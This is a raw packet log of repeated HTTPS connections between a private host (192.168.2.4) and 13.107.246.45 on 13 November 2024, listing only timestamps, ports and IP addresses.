Nov 13, 2024 18:44:32.852319956 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.852349997 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.852356911 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.852380991 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.852415085 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.852571011 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.852586031 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.852595091 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.852598906 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.854707003 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.854741096 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.854794025 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.854918003 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.854937077 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.893680096 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.893767118 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.893805027 CET	49887	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.893857002 CET	49887	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.893862009 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.893870115 CET	49887	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.893873930 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.895562887 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.895651102 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.895730972 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.895844936 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.895870924 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.987570047 CET	443	49886	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.988045931 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.988080025 CET	443	49886	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.988473892 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.988502026 CET	443	49886	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.118585110 CET	443	49886	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.118657112 CET	443	49886	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.118830919 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.118830919 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.118830919 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.120515108 CET	49892	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.120558977 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.120753050 CET	49892	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.120753050 CET	49892	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.120820045 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.341634035 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.341669083 CET	443	49886	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.506989956 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.507531881 CET	49888	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.507622004 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.507884979 CET	49888	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.507941961 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.510925055 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.511341095 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.511404991 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.511548996 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.511563063 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.602924109 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.603725910 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.603789091 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.604094028 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.604150057 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.640614033 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.640774012 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.640850067 CET	49888	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.640928030 CET	49888	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.640928030 CET	49888	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.640961885 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.640989065 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.643322945 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.643415928 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.643486023 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.643579960 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.643599033 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.648001909 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.648061991 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.648202896 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.648217916 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.648299932 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.648299932 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.648299932 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.649779081 CET	49894	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.649820089 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.649890900 CET	49894	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.649995089 CET	49894	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.650007010 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.678280115 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.678661108 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.678723097 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.679027081 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.679083109 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.734846115 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.735269070 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.735361099 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.735400915 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.735479116 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.735479116 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.735479116 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.736876011 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.736963034 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.737052917 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.737149000 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.737169981 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.818819046 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.818859100 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.818912983 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.819056034 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.819056034 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.819056988 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.819149971 CET	49891	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.819185972 CET	443	49891	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.820769072 CET	49896	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.820858002 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.821156025 CET	49896	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.821156025 CET	49896	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.821325064 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.857985973 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.860965967 CET	49892	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.860999107 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.861272097 CET	49892	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.861283064 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.950720072 CET	49890	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.950743914 CET	443	49890	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.950862885 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.950926065 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.988490105 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.988688946 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.988768101 CET	49892	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.988959074 CET	49892	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.988982916 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.989000082 CET	49892	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.989006996 CET	443	49892	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.991591930 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.991686106 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:33.991772890 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.991906881 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:33.991929054 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.399029016 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.399523020 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.399605036 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.399889946 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.399904966 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.418735981 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.419306993 CET	49894	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.419353008 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.419697046 CET	49894	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.419706106 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.477615118 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.477926016 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.477988005 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.478210926 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.478224993 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.543212891 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.543248892 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.543329954 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.543308020 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.543416977 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.545722008 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.545722961 CET	49893	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.545768976 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.545799971 CET	443	49893	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.551543951 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.552265882 CET	49896	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.552347898 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.553044081 CET	49896	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.553102016 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.553680897 CET	49898	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.553736925 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.553816080 CET	49898	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.553910971 CET	49898	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.553929090 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.555409908 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.555557013 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.555618048 CET	49894	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.555650949 CET	49894	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.555650949 CET	49894	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.555668116 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.555679083 CET	443	49894	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.557617903 CET	49899	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.557715893 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.557774067 CET	49899	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.557883024 CET	49899	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.557907104 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.606971979 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.606997013 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.607047081 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.607083082 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.607136965 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.607182026 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.607220888 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.607249022 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.607274055 CET	49895	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.607287884 CET	443	49895	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.609064102 CET	49900	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.609107971 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.609307051 CET	49900	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.609363079 CET	49900	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.609378099 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.682518959 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.682610989 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.682693005 CET	49896	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.682776928 CET	49896	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.682796001 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.682820082 CET	49896	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.682853937 CET	443	49896	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.684488058 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.684506893 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.684566975 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.684684992 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.684698105 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.719542980 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.719852924 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.719914913 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.720197916 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.720211983 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.847829103 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.847898960 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.848001003 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.848140001 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.848212004 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.848273993 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.848316908 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.848349094 CET	49897	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.848365068 CET	443	49897	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.850827932 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.850872040 CET	443	49902	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:34.851054907 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.851110935 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:34.851125002 CET	443	49902	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.289681911 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.290214062 CET	49899	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.290299892 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.290812016 CET	49899	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.290826082 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.295789957 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.296201944 CET	49898	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.296267033 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.296688080 CET	49898	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.296753883 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.354767084 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.355458975 CET	49900	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.355523109 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.356009960 CET	49900	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.356065989 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.419584036 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.419735909 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.419840097 CET	49899	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.420025110 CET	49899	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.420072079 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.420104027 CET	49899	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.420120001 CET	443	49899	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.422171116 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.422194004 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.422255039 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.422353983 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.422359943 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.432614088 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.434109926 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.434176922 CET	49898	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.434262991 CET	49898	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.434262991 CET	49898	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.434307098 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.434340000 CET	443	49898	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.436373949 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.437155008 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.437165976 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.437268019 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.437356949 CET	443	49904	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.437433004 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.437783957 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.437788963 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.437949896 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.437978983 CET	443	49904	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.487823009 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.488421917 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.488486052 CET	49900	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.488540888 CET	49900	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.488540888 CET	49900	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.488559961 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.488573074 CET	443	49900	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.491190910 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.491282940 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.491367102 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.491468906 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.491493940 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.568875074 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.568949938 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.569001913 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.569010973 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.569077015 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.569133043 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.569149971 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.569160938 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.569169998 CET	49901	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.569173098 CET	443	49901	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.571305037 CET	49906	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.571365118 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.571445942 CET	49906	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.571563959 CET	49906	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.571580887 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.595145941 CET	443	49902	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.595506907 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.595571995 CET	443	49902	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.596452951 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.596472979 CET	443	49902	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.722650051 CET	443	49902	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.722805023 CET	443	49902	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.723011017 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.723011971 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.723011971 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.725934982 CET	49907	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.726022005 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:35.726142883 CET	49907	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.726284981 CET	49907	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:35.726324081 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.028932095 CET	49902	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.028953075 CET	443	49902	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.188879013 CET	443	49904	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.189541101 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.189604998 CET	443	49904	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.189817905 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.189832926 CET	443	49904	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.198163986 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.198482990 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.198493958 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.198777914 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.198781967 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.226336956 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.227076054 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.227132082 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.227667093 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.227682114 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.317178011 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.317815065 CET	49906	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.317878962 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.318278074 CET	49906	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.318293095 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.358925104 CET	443	49904	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.359080076 CET	443	49904	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.359268904 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.359268904 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.359268904 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.359304905 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.359415054 CET	443	49903	13.107.246.45	192.168.2.4
